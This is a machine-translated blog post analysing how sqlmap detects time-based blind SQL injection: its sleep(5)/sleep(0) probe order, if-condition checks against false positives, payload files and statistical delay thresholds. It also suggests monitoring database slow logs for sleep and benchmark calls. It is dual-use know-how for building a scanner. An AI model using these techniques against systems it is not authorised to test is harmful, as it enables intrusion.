Shulou(Shulou.com)05/31 Report--

This article will explain in detail about sqlmap time-based inject analysis, the content of the article is of high quality, so the editor will share it with you for reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

1. Preface

How is sql injection detected?

My answer is: in Party A to do security, sql injection testing is relatively easy to do.

1) error reporting injection detection.

2) Don't inject errors into bool, the false positives are relatively high.

3) do time injection based on time-based, contact OPS to record slow log db, and monitor the keywords of sleep,benchmark. You can add the id number of scanning task to the time decimal point of sleep to facilitate positioning. (p.s. This method can find 99% of the sql injection)

Therefore, when doing time-based-based time injection, I limit the time error very harshly. However, @ chengable does security-related work in Party B, and time injection based on time-based generally cannot be done. It is understood that he is mainly to filter the existence of injection points, plus sqlmapapi.py detection. I also tested with sqlmap earlier, and the problems I encountered were too many false positives, long scanning time, and then tried sqlmapapi.py, but the problem was that the scanning time was too long, and it did not support injection in json format (details). However, the time injection of sqlmap is relatively accurate, what if you don't want to use sqlmapapi.py? Here the logic of sqlmap's time-based injection is brought out.

two。 Simple Analysis of time-based injection of sqlmap

Complain: sqlmap's code is irregular, ugly, and massive. Before, a boss recommended me to read the sqlmap source code and learn a wave, but now I think it's a good thing I gave up early.

So, lazy do not want to see the source code plus-- technique=T-v 3 first look at sqlmap detection payload.

It seems that laziness has also found some ways, as can be seen from the screenshot:

First, sqlmap plugs in the injected payload of sleep:

First, sleep (5) is plugged in, and after it is found that it has been executed, then sleep (0), and finally sleep (5).

Then guess, the general idea of the check is to sleep (5) first, and then sleep (0) if the second delay is successful. If no delay is found, continue with sleep (5), and if the delay is successful again, a reminder appears that there may be an injection:

Finally, cleverly, in order to prevent false positives, sqlmap uses the judgment condition of if to eliminate false positives. From the figure above, we can see that sqlmap tests the equation twice and the equation does not hold up twice, and judges the false positives according to the second delay.

3. An in-depth analysis of the source code

Go back to the source code and take a look: according to some of the previous keywords, let's go directly to the code to have a look. For example, appears to be* appears before the search and sees the code in the first step:

Sqlmap/lib/controller/checks.py:

It is found here that it is very close to the previous guess.

Find out where the payload is, especially the payload of the if condition, or query it with keywords, and find it here:

Sqlmap/xml/payloads/time_blind.xml:

You can see that the payload for each if condition is in the vector field.

4. Close

Closing the character in front of the injection point is the key to whether it can be injected.

Tools/sqlmap/xml/boundaries.xml has been observed, so we also need to refer to a variety of closures here:

5. Determine whether the delay is 5.1 method 1

Referring to the previous injection of awvs, I came up with a detection method that is easier to understand. Take the consumption time of 6 normal tests without injection of payload, and calculate the average time of original request (ori_time).

When the injection time is sleep (5), the current time is subtracted from ori_time as sleep_time. If the sleep_time is less than 4, the delay is not considered to have occurred. (considering that the ori_time becomes larger due to the influence of the network, the threshold is set to four seconds.)

When the injection time is sleep (0), the current time is subtracted from ori_time as sleep_time. If sleep_time is greater than 2, there is a false alarm in the delay.

5.2 method 2

If you look at the sqlmap code again, people use a math problem that I don't understand (details)

Follow-up: Request.queryPage-- > wasLastResponseDelayed, you can see that the logic is: take 30 times of non-injection payload normal test time, put them into the kb.responseTimes. The standard deviation of 30 calculations is deviation, and according to deviation, the slowest response time is lowerStdLimit:

Its value is the average of 30 times plus the TIME_STDEV_COEFF* standard deviation (deviation). As for TIME_STDEV_COEFF, setting it to 7 makes the accuracy of judgment at 99.9999999440%.

Finally, it is determined whether the elapsed time of the current request is greater than lowerStdLimit, greater than the delay occurs, less than zero (in addition, when the lowerStdLimit is less than 0.5 seconds, the lowerStdLimit is 0.5 seconds).

Sensibility tells me that I should choose method one, reason tells me that I should choose method two. I chose method 2 to test the injection point (details). Steadily scanned for injection vulnerabilities.

This is the end of the sqlmap time-based inject analysis. I hope the above content can be helpful to you and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.